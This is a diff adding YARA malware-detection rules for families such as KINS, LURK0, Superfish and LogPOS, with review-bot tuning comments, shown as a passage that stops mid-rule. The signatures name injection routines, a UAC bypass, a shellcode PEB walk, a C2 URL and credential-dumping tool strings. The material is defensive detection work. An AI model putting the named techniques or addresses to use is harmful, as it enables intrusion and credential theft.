+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Insta11Code : Insta11 Family 
+{
+    meta:
+        description = "Insta11 code features"
+        author = "Seth Hardy"
+        last_modified = "2014-06-23"
+    
+    strings:
+        // jmp $+5; push 423h
+        $jumpandpush = { E9 00 00 00 00 68 23 04 00 00 }
+    
+    condition:
+        any of them
+}
+
+rule Insta11Strings : Insta11 Family
+{
+    meta:
+        description = "Insta11 Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-23"
+        
+    strings:
+        $ = "XTALKER7"
+        $ = "Insta11 Microsoft" wide ascii
+        $ = "wudMessage"
+        $ = "ECD4FC4D-521C-11D0-B792-00A0C90312E1"
+        $ = "B12AE898-D056-4378-A844-6D393FE37956"
+        
+    condition:
+       any of them
+}
+
+rule Insta11 : Family
+{
+    meta:
+        description = "Insta11"
+        author = "Seth Hardy"
+        last_modified = "2014-06-23"
+        
+    condition:
+        Insta11Code or Insta11Strings
+}
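Review bot: In Insta11Strings, `$ = "ECD4FC4D-521C-11D0-B792-00A0C90312E1"` under `any of them` is risky: that value has the shape of a Windows shell CLSID and, if it is a standard one, will appear in benign binaries, so consider dropping it or only counting it together with another string (`2 of them`). The modifiers are also inconsistent: `"Insta11 Microsoft"` carries `wide ascii` while the other four strings match ASCII only, so a wide-encoded `wudMessage` or `XTALKER7` would be missed; apply `wide ascii` to all if the samples justify it. The file is named Install11.yar while every rule and tag is spelled `Insta11`, which will confuse anyone grepping the repository for one spelling or the other.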
diff --git a/malware/Intel_Virtualization.yar b/malware/Intel_Virtualization.yar
new file mode 100644
index 0000000..ef95706
--- /dev/null
+++ b/malware/Intel_Virtualization.yar
@@ -0,0 +1,40 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Intel_Virtualization_Wizard_exe {
+  meta:
+    author = "cabrel@zerklabs.com"
+    description = "Dynamic DLL abuse executable"
+
+    file_1_seen = "2013-05-21"
+    file_1_sha256 = "7787757ae851f4a162f46f794be1532ab78e1928185212bdab83b3106f28c708"
+
+  strings:
+    $a = {4C 6F 61 64 53 54 52 49 4E 47}
+    $b = {49 6E 69 74 69 61 6C 69 7A 65 4B 65 79 48 6F 6F 6B}
+    $c = {46 69 6E 64 52 65 73 6F 75 72 63 65 73}
+    $d = {4C 6F 61 64 53 54 52 49 4E 47 46 72 6F 6D 48 4B 43 55}
+    $e = {68 63 63 75 74 69 6C 73 2E 44 4C 4C}
+  condition:
+    all of them
+}
+
+rule Intel_Virtualization_Wizard_dll {
+  meta:
+    author = "cabrel@zerklabs.com"
+    description = "Dynamic DLL (Malicious)"
+
+    file_1_seen = "2013-05-21"
+    file_1_sha256 = "485ae043b6a5758789f1d33766a26d8b45b9fde09cde0512aa32d4bd1ee04f28"
+
+  strings:
+    $a = {48 3A 5C 46 61 73 74 5C 50 6C 75 67 28 68 6B 63 6D 64 29 5C}
+    $b = {64 6C 6C 5C 52 65 6C 65 61 73 65 5C 48 69 6A 61 63 6B 44 6C 6C 2E 70 64 62}
+
+  condition:
+    ($a and $b) and Intel_Virtualization_Wizard_exe
+}
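Review bot: The hex strings in both rules are plain ASCII written out byte by byte (`{4C 6F 61 64 53 54 52 49 4E 47}` is `LoadSTRING`, `$e` is `hccutils.DLL`, the dll rule's `$b` ends in `HijackDll.pdb`); as text strings, e.g. `$a = "LoadSTRING"` and `$e = "hccutils.DLL"`, they match identically but let a reviewer see what is being detected. The `Intel_Virtualization_Wizard_dll` condition additionally requires `Intel_Virtualization_Wizard_exe` to match on the same file, so the DLL rule only fires if the DLL itself contains all five export-name strings; if that is the intent, a comment stating it, e.g. `// the sideloaded DLL must carry the same export names the wizard imports`, would document the dependency, otherwise the DLL rule is unlikely to fire on the DLL alone. `import "pe"` is unused by either rule and can be removed.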
diff --git a/malware/KINS.yar b/malware/KINS.yar
new file mode 100644
index 0000000..082254c
--- /dev/null
+++ b/malware/KINS.yar
@@ -0,0 +1,52 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+rule KINS_dropper {
+	meta:
+		author = "AlienVault Labs aortega@alienvault.com"
+		description = "Match protocol, process injects and windows exploit present in KINS dropper"
+		reference = "http://goo.gl/arPhm3"
+	strings:
+		// Network protocol
+		$n1 = "tid=%d&ta=%s-%x" fullword
+		$n2 = "fid=%d" fullword
+		$n3 = "%[^.].%[^(](%[^)])" fullword
+		// Injects
+		$i0 = "%s [%s %d] 77 %s"
+		$i01 = "Global\\%s%x"
+		$i1 = "Inject::InjectProcessByName()"
+		$i2 = "Inject::CopyImageToProcess()"
+		$i3 = "Inject::InjectProcess()"
+		$i4 = "Inject::InjectImageToProcess()"
+		$i5 = "Drop::InjectStartThread()"
+		// UAC bypass
+		$uac1 = "ExploitMS10_092"
+		$uac2 = "\\globalroot\\systemroot\\system32\\tasks\\" ascii wide
+		$uac3 = "<RunLevel>HighestAvailable</RunLevel>" ascii wide
+	condition:
+		2 of ($n*) and 2 of ($i*) and 2 of ($uac*)
+}
+
+rule KINS_DLL_zeus {
+	meta:
+		author = "AlienVault Labs aortega@alienvault.com"
+		description = "Match default bot in KINS leaked dropper, Zeus"
+		reference = "http://goo.gl/arPhm3"
+	strings:
+		// Network protocol
+		$n1 = "%BOTID%" fullword
+		$n2 = "%opensocks%" fullword
+		$n3 = "%openvnc%" fullword
+		$n4 = /Global\\(s|v)_ev/ fullword
+		// Crypted strings
+		$s1 = "\x72\x6E\x6D\x2C\x36\x7D\x76\x77"
+		$s2 = "\x18\x04\x0F\x12\x16\x0A\x1E\x08\x5B\x11\x0F\x13"
+		$s3 = "\x39\x1F\x01\x07\x15\x19\x1A\x33\x19\x0D\x1F"
+		$s4 = "\x62\x6F\x71\x78\x63\x61\x7F\x69\x2D\x67\x79\x65"
+		$s5 = "\x6F\x69\x7F\x6B\x61\x53\x6A\x7C\x73\x6F\x71"
+	condition:
+		all of ($n*) and 1 of ($s*)
+}
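Review bot: The five "Crypted strings" in KINS_DLL_zeus (`$s1`..`$s5`) are opaque byte sequences with no record of what they decode to or under which key, so nobody can verify them or regenerate them when the bot's string table changes. Record the plaintext and derivation beside each, e.g. `$s1 = "\x72\x6E\x6D\x2C\x36\x7D\x76\x77" // encrypted "<plaintext>", key <..> — TODO fill in from the sample`. In KINS_dropper the `// UAC bypass` comment over `$uac1 = "ExploitMS10_092"` would be clearer as `// Privilege escalation via the MS10-092 Task Scheduler bug; $uac2/$uac3 are the task-file path and RunLevel it writes`, since that is what the three strings together point at.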
diff --git a/malware/Kelihos.yar b/malware/Kelihos.yar
new file mode 100644
index 0000000..6b803d9
--- /dev/null
+++ b/malware/Kelihos.yar
@@ -0,0 +1,20 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule KelihosHlux
+{
+  meta:
+	author = "@malpush"
+	maltype = "KelihosHlux"
+	description = "http://malwared.ru"
+	date = "22/02/2014"
+  strings:
+    $KelihosHlux_HexString = {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}
+   
+  condition:
+    $KelihosHlux_HexString
+}
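Review bot: `description = "http://malwared.ru"` is a link, not a description; move it to `reference = "http://malwared.ru"` and state what the single signature is, e.g. `description = "Kelihos/Hlux bot - code fragment"` (adjusted to what the fragment actually is, which the rule does not record). The rule rests on that one hex string with no file-type or size guard, so it is evaluated against every scanned object; if it targets on-disk samples, `uint16(0) == 0x5A4D and $KelihosHlux_HexString` keeps it on PE files. `22/02/2014` is also the only day-first date in these files — `2014-02-22` matches the rest.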
diff --git a/malware/LURK0.yar b/malware/LURK0.yar
new file mode 100644
index 0000000..ae28021
--- /dev/null
+++ b/malware/LURK0.yar
@@ -0,0 +1,96 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule LURK0Header : Family LURK0 {
+	meta:
+		description = "5 char code for LURK0"
+		author = "Katie Kleemola"
+		last_updated = "07-21-2014"
+	
+	strings:
+		$ = { C6 [5] 4C C6 [5] 55 C6 [5] 52 C6 [5] 4B C6 [5] 30 }
+
+	condition:
+		any of them
+}
+
+rule CCTV0Header : Family CCTV0 {
+        meta:  
+		description = "5 char code for LURK0"
+		author = "Katie Kleemola"
+		last_updated = "07-21-2014"
+
+	strings:
+		//if its just one char a time
+		$ = { C6 [5] 43 C6 [5] 43 C6 [5] 54 C6 [5] 56 C6 [5] 30 }
+		// bit hacky but for when samples dont just simply mov 1 char at a time
+		$ = { B0 43 88 [3] 88 [3] C6 [3] 54 C6 [3] 56 [0-12] (B0 30 | C6 [3] 30) }
+
+	condition:
+		any of them
+}
+
+rule SharedStrings : Family {
+	meta:
+		description = "Internal names found in LURK0/CCTV0 samples"
+		author = "Katie Kleemola"
+		last_updated = "07-22-2014"
+	
+	strings:
+		// internal names
+		$i1 = "Butterfly.dll"
+		$i2 = /\\BT[0-9.]+\\ButterFlyDLL\\/
+		$i3 = "ETClientDLL"
+
+		// dbx
+		$d1 = "\\DbxUpdateET\\" wide
+		$d2 = "\\DbxUpdateBT\\" wide
+		$d3 = "\\DbxUpdate\\" wide
+		
+		// other folders
+		$mc1 = "\\Micet\\"
+
+		// embedded file names
+		$n1 = "IconCacheEt.dat" wide
+		$n2 = "IconConfigEt.dat" wide
+
+		$m1 = "\x00\x00ERXXXXXXX\x00\x00" wide
+		$m2 = "\x00\x00111\x00\x00" wide
+		$m3 = "\x00\x00ETUN\x00\x00" wide
+		$m4 = "\x00\x00ER\x00\x00" wide
+
+	condition:
+		any of them //todo: finetune this
+
+}
+
+rule LURK0 : Family LURK0 {
+	
+	meta:
+		description = "rule for lurk0"
+		author = "Katie Kleemola"
+		last_updated = "07-22-2014"
+
+	condition:
+		LURK0Header and SharedStrings
+
+}
+
+
+rule CCTV0 : Family CCTV0 {
+
+	meta:
+		description = "rule for cctv0"
+		author = "Katie Kleemola"
+		last_updated = "07-22-2014"
+
+	condition:
+		CCTV0Header and SharedStrings
+
+}
+
+
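Review bot: SharedStrings fires on `any of them`, yet `$m2` (`"\x00\x00111\x00\x00" wide`) and `$m4` (`"\x00\x00ER\x00\x00" wide`) are two- to three-character sequences padded with nulls, a likely false-positive source in any UTF-16 resource or string table — and the rule is exported on its own, not only through LURK0/CCTV0. Either declare it `private rule SharedStrings : Family` so it only feeds the two family rules, or keep the short group out of the any-of: `any of ($i*, $d*, $n*) or $mc1 or 2 of ($m1, $m2, $m3, $m4)`. CCTV0Header's `description = "5 char code for LURK0"` is a copy-paste from the rule above it and should read `"5 char code for CCTV0"`.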
diff --git a/malware/Lenovo_superfish.yar b/malware/Lenovo_superfish.yar
new file mode 100644
index 0000000..034c39e
--- /dev/null
+++ b/malware/Lenovo_superfish.yar
@@ -0,0 +1,29 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+/* LENOVO Superfish -------------------------------------------------------- */
+
+rule VisualDiscovery_Lonovo_Superfish_SSL_Hijack {
+	meta:
+		description = "Lenovo Superfish SSL Interceptor - file VisualDiscovery.exe"
+		author = "Florian Roth / improved by kbandla"
+		reference = "https://twitter.com/4nc4p/status/568325493558272000"
+		date = "2015/02/19"
+		hash1 = "99af9cfc7ab47f847103b5497b746407dc566963"
+		hash2 = "f0b0cd0227ba302ac9ab4f30d837422c7ae66c46"
+		hash3 = "f12edf2598d8f0732009c5cd1df5d2c559455a0b"
+		hash4 = "343af97d47582c8150d63cbced601113b14fcca6"
+	strings:
+		$mz = { 4d 5a }
+		//$s1 = "VisualDiscovery.exe" fullword wide
+		$s2 = "Invalid key length used to initialize BlowFish." fullword ascii
+		$s3 = "GetPCProxyHandler" fullword ascii
+		$s4 = "StartPCProxy" fullword ascii
+		$s5 = "SetPCProxyHandler" fullword ascii
+	condition:
+		( $mz at 0 ) and filesize < 2MB and all of ($s*)
+}
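Review bot: The rule name `VisualDiscovery_Lonovo_Superfish_SSL_Hijack` misspells Lenovo; `VisualDiscovery_Lenovo_Superfish_SSL_Hijack` is the fix, but anyone keying scanner output or allow-lists on the old identifier needs to know it changed. `( $mz at 0 )` with the two-byte `{ 4d 5a }` atom is the slow form of the PE check — `uint16(0) == 0x5A4D` expresses it without a string scan. The commented-out `$s1` should be removed or carry a reason (e.g. `// $s1 dropped: file is frequently renamed`), since `all of ($s*)` would otherwise require it if someone re-enables it.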
diff --git a/malware/Leverage.yar b/malware/Leverage.yar
new file mode 100644
index 0000000..048b47d
--- /dev/null
+++ b/malware/Leverage.yar
@@ -0,0 +1,25 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule leverage_a
+{
+	meta:
+		author = "earada@alienvault.com"
+		version = "1.0"
+		description = "OSX/Leverage.A"
+		date = "2013/09"
+	strings:
+		$a1 = "ioreg -l | grep \"IOPlatformSerialNumber\" | awk -F"
+		$a2 = "+:Users:Shared:UserEvent.app:Contents:MacOS:"
+		$a3 = "rm '/Users/Shared/UserEvent.app/Contents/Resources/UserEvent.icns'"
+		$script1 = "osascript -e 'tell application \"System Events\" to get the hidden of every login item'"
+		$script2 = "osascript -e 'tell application \"System Events\" to get the name of every login item'"
+		$script3 = "osascript -e 'tell application \"System Events\" to get the path of every login item'"
+		$properties = "serverVisible \x00"
+	condition:
+		all of them
+}
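Review bot: `import "pe"` is unused and this rule targets OSX/Leverage.A (Mach-O and AppleScript strings), so the import only ties the file to the pe module; drop it. `$a1` stops at `awk -F`, presumably deliberately so that differing field-separator arguments still match — a `// prefix only, awk args vary` comment would stop the next reader from "completing" it. `all of them` across seven distinct paths and osascript lines is tight for a single known sample and will miss a variant that drops any one string; if broader coverage is wanted, `6 of them` is the usual compromise.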
diff --git a/malware/LogPOS.yar b/malware/LogPOS.yar
new file mode 100644
index 0000000..be6b0f7
--- /dev/null
+++ b/malware/LogPOS.yar
@@ -0,0 +1,23 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+rule LogPOS
+{
+    meta:
+        author = "Morphick Security"
+        description = "Detects Versions of LogPOS"
+        md5 = "af13e7583ed1b27c4ae219e344a37e2b"
+    strings:
+        $mailslot = "\\\\.\\mailslot\\LogCC"
+        $get = "GET /%s?encoding=%c&t=%c&cc=%I64d&process="
+        //64A130000000      mov eax, dword ptr fs:[0x30]
+        //8B400C        mov eax, dword ptr [eax + 0xc]
+        //8B401C        mov eax, dword ptr [eax + 0x1c]
+        //8B4008        mov eax, dword ptr [eax + 8]
+        $sc = {64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 }
+    condition:
+        $sc and 1 of ($mailslot,$get)
+}
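Review bot: `$sc` is the stock 32-bit PEB walk (`fs:[0x30]` → PEB, `+0xC` → Ldr, `+0x1C` → InInitializationOrderModuleList, `+8` → the entry's DllBase) that most position-independent shellcode and many packers use, so it is generic and the rule is only as specific as `$mailslot`/`$get`; say so above the disassembly, e.g. `// Generic kernel32-base PEB walk shared by much shellcode; the strings below provide the specificity`. There is also no `uint16(0) == 0x5A4D` guard, which is reasonable if the rule is meant for process-memory scans — a one-line `// intended for memory and disk` comment would settle the scope for whoever tunes it later.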
diff --git a/malware/LostDoor.yar b/malware/LostDoor.yar
new file mode 100644
index 0000000..76889c9
--- /dev/null
+++ b/malware/LostDoor.yar
@@ -0,0 +1,20 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule lost_door : Trojan
+{
+	meta:
+		author="Kevin Falcoz"
+		date="23/02/2013"
+		description="Lost Door"
+	
+	strings:
+		$signature1={45 44 49 54 5F 53 45 52 56 45 52} /*EDIT_SERVER*/
+		
+	condition:
+		$signature1
+}
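Review bot: The entire rule is the 11-byte ASCII `EDIT_SERVER` (`$signature1`) with no file-type, size or second-string requirement, so any binary or text that contains that identifier — a resource name, an export, a config key — trips `lost_door`. Write it as text so it is reviewable and bound it at least to word boundaries and, if the target is the Windows server/builder executables, to PE files: `$signature1 = "EDIT_SERVER" ascii fullword` and `condition: uint16(0) == 0x5A4D and $signature1`; a second family-specific string would be better still. The meta carries no reference or hash, so there is nothing to re-derive or strengthen the signature from — add one.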
diff --git a/malware/LuckyCat.yar b/malware/LuckyCat.yar
new file mode 100644
index 0000000..c41b574
--- /dev/null
+++ b/malware/LuckyCat.yar
@@ -0,0 +1,22 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule LuckyCatCode : LuckyCat Family 
+{
+    meta:
+        description = "LuckyCat code tricks"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    strings:
+        $xordecrypt = { BF 0F 00 00 00 F7 F7 ?? ?? ?? ?? 32 14 39 80 F2 7B }
+        $dll = { C6 ?? ?? ?? 64 C6 ?? ?? ?? 6C C6 ?? ?? ?? 6C }
+        $commonletters = { B? 63 B? 61 B? 73 B? 65 }
+        
+    condition:
+        $xordecrypt or ($dll and $commonletters)
+}
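Review bot: `B?` in `$commonletters` matches opcodes B0–BF, but only B0–B7 are `mov r8, imm8`; B8–BF take a 32-bit immediate, so `B8 63 B? 61 ...` would be matching inside an imm32 rather than a byte-wise build of "case" — if single-byte stores are the intent, replace each `B?` with `(B0|B1|B2|B3|B4|B5|B6|B7)`. Neither pattern records the text being assembled (`$dll` stores 'd','l','l'; `$commonletters` stores 'c','a','s','e'), so a trailing comment on each, e.g. `// mov byte [..], 'd' / 'l' / 'l'`, would help the next maintainer. In `$xordecrypt`, `80 F2 7B` is `xor dl, 0x7B` — the XOR key — and `F7 F7` after `mov edi, 0xF` is `div edi`; both are worth naming since they are the parts most likely to change between variants.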
diff --git a/malware/MacControl.yar b/malware/MacControl.yar
new file mode 100644
index 0000000..6c66ac4
--- /dev/null
+++ b/malware/MacControl.yar
@@ -0,0 +1,56 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule MacControlCode : MacControl Family 
+{
+    meta:
+        description = "MacControl code tricks"
+        author = "Seth Hardy"
+        last_modified = "2014-06-17"
+        
+    strings:
+        // Load these function strings 4 characters at a time. These check the first two blocks:
+        $L4_Accept = { C7 ?? 41 63 63 65 C7 ?? 04 70 74 3A 20 }
+        $L4_AcceptLang = { C7 ?? 41 63 63 65 C7 ?? 04 70 74 2D 4C }
+        $L4_Pragma = { C7 ?? 50 72 61 67 C7 ?? 04 6D 61 3A 20 }
+        $L4_Connection = { C7 ?? 43 6F 6E 6E C7 ?? 04 65 63 74 69 }
+        $GEThgif = { C7 ?? 47 45 54 20 C7 ?? 04 2F 68 2E 67 }
+        
+    condition:
+        all of ($L4*) or $GEThgif
+}
+
+rule MacControlStrings : MacControl Family
+{
+    meta:
+        description = "MacControl Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-17"
+        
+    strings:
+        $ = "HTTPHeadGet"
+        $ = "/Library/launched"
+        $ = "My connect error with no ip!"
+        $ = "Send File is Failed"
+        $ = "****************************You Have got it!****************************"
+        
+    condition:
+        any of them
+}
+
+rule MacControl : Family
+{
+    meta:
+        description = "MacControl"
+        author = "Seth Hardy"
+        last_modified = "2014-06-16"
+        
+    condition:
+        MacControlCode or MacControlStrings
+}
+
+
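Review bot: The comment `// Load these function strings 4 characters at a time` is misleading — the immediates are HTTP request text, not function names: `41 63 63 65`/`70 74 3A 20` is "Acce"+"pt: ", `70 74 2D 4C` "pt-L", `50 72 61 67`/`6D 61 3A 20` "Prag"+"ma: ", `43 6F 6E 6E`/`65 63 74 69` "Conn"+"ecti", and `47 45 54 20`/`2F 68 2E 67` "GET "+"/h.g"; write it as `// HTTP header/request text stored 4 bytes at a time: mov dword [reg], imm32 ; mov dword [reg+4], imm32`. The `C7 ?? 04` form pins the second store to a `[reg+4]` disp8 encoding, which fits the seen samples but will miss a build that uses another base register or displacement — worth a line so nobody tightens or loosens it blindly. `import "pe"` is unused on this Mach-O family.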
diff --git a/malware/Mirage.yar b/malware/Mirage.yar
new file mode 100644
index 0000000..850fdc5
--- /dev/null
+++ b/malware/Mirage.yar
@@ -0,0 +1,32 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule MirageStrings : Mirage Family
+{
+    meta:
+        description = "Mirage Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    strings:
+        $ = "Neo,welcome to the desert of real." wide ascii
+        $ = "/result?hl=en&id=%s"
+        
+    condition:
+       any of them
+}
+
+rule Mirage : Family
+{
+    meta:
+        description = "Mirage"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    condition:
+        MirageStrings
+}
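Review bot: The two strings in MirageStrings are declared inconsistently — `"Neo,welcome to the desert of real."` carries `wide ascii` while `"/result?hl=en&id=%s"` has no modifier (ASCII only), so a UTF-16 copy of the URI format string is missed while the quote is caught in both encodings; add `wide ascii` to the second as well, or comment why it is ASCII-only. With `any of them`, the URI format string is the one the rule will mostly fire on, so it is the one to keep tight; if the samples are PE, a `uint16(0) == 0x5A4D and` prefix on the condition would cut noise from web logs and proxies that carry the same string.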
diff --git a/malware/Miscelanea.yar b/malware/Miscelanea.yar
new file mode 100644
index 0000000..2fede01
--- /dev/null
+++ b/malware/Miscelanea.yar
@@ -0,0 +1,594 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule tran_duy_linh
+{
+meta:
+	author = "@patrickrolsen"
+	maltype = "Misc."
+	version = "0.2"
+	reference = "8fa804105b1e514e1998e543cd2ca4ea, 872876cfc9c1535cd2a5977568716ae1, etc." 
+	date = "01/03/2014"
+strings:
+	$doc = {D0 CF 11 E0} //DOCFILE0
+	$string1 = "Tran Duy Linh" fullword
+	$string2 = "DLC Corporation" fullword
+condition:
+    ($doc at 0) and (all of ($string*))
+}
+
+rule misc_iocs
+{
+meta:
+	author = "@patrickrolsen"
+	maltype = "Misc."
+	version = "0.1"
+	reference = "N/A" 
+strings:
+	$doc = {D0 CF 11 E0} //DOCFILE0
+	$s1 = "dw20.exe"
+	$s2 = "cmd /"
+condition:
+    ($doc at 0) and (1 of ($s*))
+}
+
+rule malicious_LNK_files
+{
+meta:
+	author = "@patrickrolsen"
+strings:
+	$magic = {4C 00 00 00 01 14 02 00} // L.......
+	$s1 = "\\RECYCLER\\" wide
+	$s2 = "%temp%" wide
+	$s3 = "%systemroot%\\system32\\cmd.exe" wide
+	//$s4 = "./start" wide
+	$s5 = "svchost.exe" wide
+	$s6 = "lsass.exe" wide
+	$s7 = "csrss.exe" wide
+	$s8 = "winlogon.exe" wide
+	//$s9 = "%cd%" wide
+	$s10 = "%appdata%" wide
+	$s11 = "%programdata%" wide
+	$s12 = "%localappdata%" wide
+	$s13 = ".cpl" wide
+condition:
+	($magic at 0) and any of ($s*)
+}
+
+rule memory_pivy
+
+{
+   meta:
+	  author = "https://github.com/jackcr/"
+   strings:
+      $a = {00 00 00 00 00 00 00 00 00 00 00 53 74 75 62 50 61 74 68 00} // presence of pivy in memory
+
+   condition: 
+      any of them
+
+}
+
+rule memory_shylock
+
+{
+   meta:
+	  author = "https://github.com/jackcr/"
+
+   strings:
+      $a = /pipe\\[A-F0-9]{32}/     //Named pipe created by the malware
+      $b = /id=[A-F0-9]{32}/     //Portion or the uri beacon
+      $c = /MASTER_[A-F0-9]{32}/     //Mutex created by the malware
+      $d = "***Load injects by PIPE (%s)" //String found in binary
+      $e = "***Load injects url=%s (%s)" //String found in binary
+      $f = "*********************** Ping Ok ************************" //String found in binary
+      $g = "*** LOG INJECTS *** %s"     //String found in binary
+
+   condition: 
+      any of them
+
+}
+
+rule RookieStrings : Rookie Family
+{
+    meta:
+        description = "Rookie Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    strings:
+        $ = "RookIE/1.0"
+        
+    condition:
+       any of them
+}
+
+rule ScanBox_Malware_Generic {
+	meta:
+		description = "Scanbox Chinese Deep Panda APT Malware http://goo.gl/MUUfjv and http://goo.gl/WXUQcP"
+		author = "Florian Roth"
+		reference1 = "http://goo.gl/MUUfjv"
+		reference2 = "http://goo.gl/WXUQcP"
+		date = "2015/02/28"
+		hash1 = "8d168092d5601ebbaed24ec3caeef7454c48cf21366cd76560755eb33aff89e9"
+		hash2 = "d4be6c9117db9de21138ae26d1d0c3cfb38fd7a19fa07c828731fa2ac756ef8d"
+		hash3 = "3fe208273288fc4d8db1bf20078d550e321d9bc5b9ab80c93d79d2cb05cbf8c2"
+	strings:
+		/* Sample 1 */
+		$s0 = "http://142.91.76.134/p.dat" fullword ascii
+		$s1 = "HttpDump 1.1" fullword ascii
+		
+		/* Sample 2 */
+		$s3 = "SecureInput .exe" fullword wide
+		$s4 = "http://extcitrix.we11point.com/vpn/index.php?ref=1" fullword ascii
+		
+		/* Sample 3 */
+		$s5 = "%SystemRoot%\\System32\\svchost.exe -k msupdate" fullword ascii
+		$s6 = "ServiceMaix" fullword ascii		
+		
+		/* Certificate and Keywords */
+		$x1 = "Management Support Team1" fullword ascii
+		$x2 = "DTOPTOOLZ Co.,Ltd.0" fullword ascii
+		$s3 = "SEOUL1" fullword ascii
+	condition:
+		( 1 of ($s*) and 2 of ($x*) ) or 
+		( 3 of ($x*) )
+}
+
+rule TrojanDownloader {
+	meta:
+		description = "Trojan Downloader - Flash Exploit Feb15"
+		author = "Florian Roth"
+		reference = "http://goo.gl/wJ8V1I"
+		date = "2015/02/11"
+		hash = "5b8d4280ff6fc9c8e1b9593cbaeb04a29e64a81e"
+		score = 60
+	strings:
+		$x1 = "Hello World!" fullword ascii
+		$x2 = "CONIN$" fullword ascii
+			
+		$s6 = "GetCommandLineA" fullword ascii
+		$s7 = "ExitProcess" fullword ascii
+		$s8 = "CreateFileA" fullword ascii						
+
+		$s5 = "SetConsoleMode" fullword ascii		
+		$s9 = "TerminateProcess" fullword ascii	
+		$s10 = "GetCurrentProcess" fullword ascii
+		$s11 = "UnhandledExceptionFilter" fullword ascii
+		$s3 = "user32.dll" fullword ascii
+		$s16 = "GetEnvironmentStrings" fullword ascii
+		$s2 = "GetLastActivePopup" fullword ascii		
+		$s17 = "GetFileType" fullword ascii
+		$s19 = "HeapCreate" fullword ascii
+		$s20 = "VirtualFree" fullword ascii
+		$s21 = "WriteFile" fullword ascii
+		$s22 = "GetOEMCP" fullword ascii
+		$s23 = "VirtualAlloc" fullword ascii
+		$s24 = "GetProcAddress" fullword ascii
+		$s26 = "FlushFileBuffers" fullword ascii
+		$s27 = "SetStdHandle" fullword ascii
+		$s28 = "KERNEL32.dll" fullword ascii
+	condition:
+		$x1 and $x2 and ( all of ($s*) ) and filesize < 35000
+}
+
+rule Embedded_EXE_Cloaking {
+        meta:
+                description = "Detects an embedded executable in a non-executable file"
+                author = "Florian Roth"
+                date = "2015/02/27"
+                score = 80
+        strings:
+                $noex_png = { 89 50 4E 47 }
+                $noex_pdf = { 25 50 44 46 }
+                $noex_rtf = { 7B 5C 72 74 66 31 }
+                $noex_jpg = { FF D8 FF E0 }
+                $noex_gif = { 47 49 46 38 }
+                $mz  = { 4D 5A }
+                $a1 = "This program cannot be run in DOS mode"
+                $a2 = "This program must be run under Win32"
+        condition:
+                (
+                        ( $noex_png at 0 ) or
+                        ( $noex_pdf at 0 ) or
+                        ( $noex_rtf at 0 ) or
+                        ( $noex_jpg at 0 ) or
+                        ( $noex_gif at 0 )
+                )
+                and
+                for any i in (1..#mz): ( @a1 < ( @mz[i] + 200 ) or @a2 < ( @mz[i] + 200 ) )
+}
+
+rule Cloaked_as_JPG {
+        meta:
+                description = "Detects a cloaked file as JPG"
+                author = "Florian Roth (eval section from Didier Stevens)"
+                date = "2015/02/29"
+                score = 70
+        strings:
+                $ext = "extension: .jpg"
+        condition:
+                $ext and uint16be(0x00) != 0xFFD8
+}
+
+rule WindowsCredentialEditor
+{
+    meta: 
+    	description = "Windows Credential Editor" threat_level = 10 score = 90
+    strings:
+		$a = "extract the TGT session key"
+		$b = "Windows Credentials Editor"
+    condition: 
+    	$a or $b
+}
+
+rule Amplia_Security_Tool
+{
+    meta: 
+		description = "Amplia Security Tool" 
+		score = 60
+		nodeepdive = 1
+    strings:
+		$a = "Amplia Security"
+		$b = "Hernan Ochoa"
+		$c = "getlsasrvaddr.exe"
+		$d = "Cannot get PID of LSASS.EXE"
+		$e = "extract the TGT session key"
+		$f = "PPWDUMP_DATA"
+    condition: 1 of them
+}
+
+
+
+rule perlbot_pl {
+	meta:
+		description = "Semi-Auto-generated  - file perlbot.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
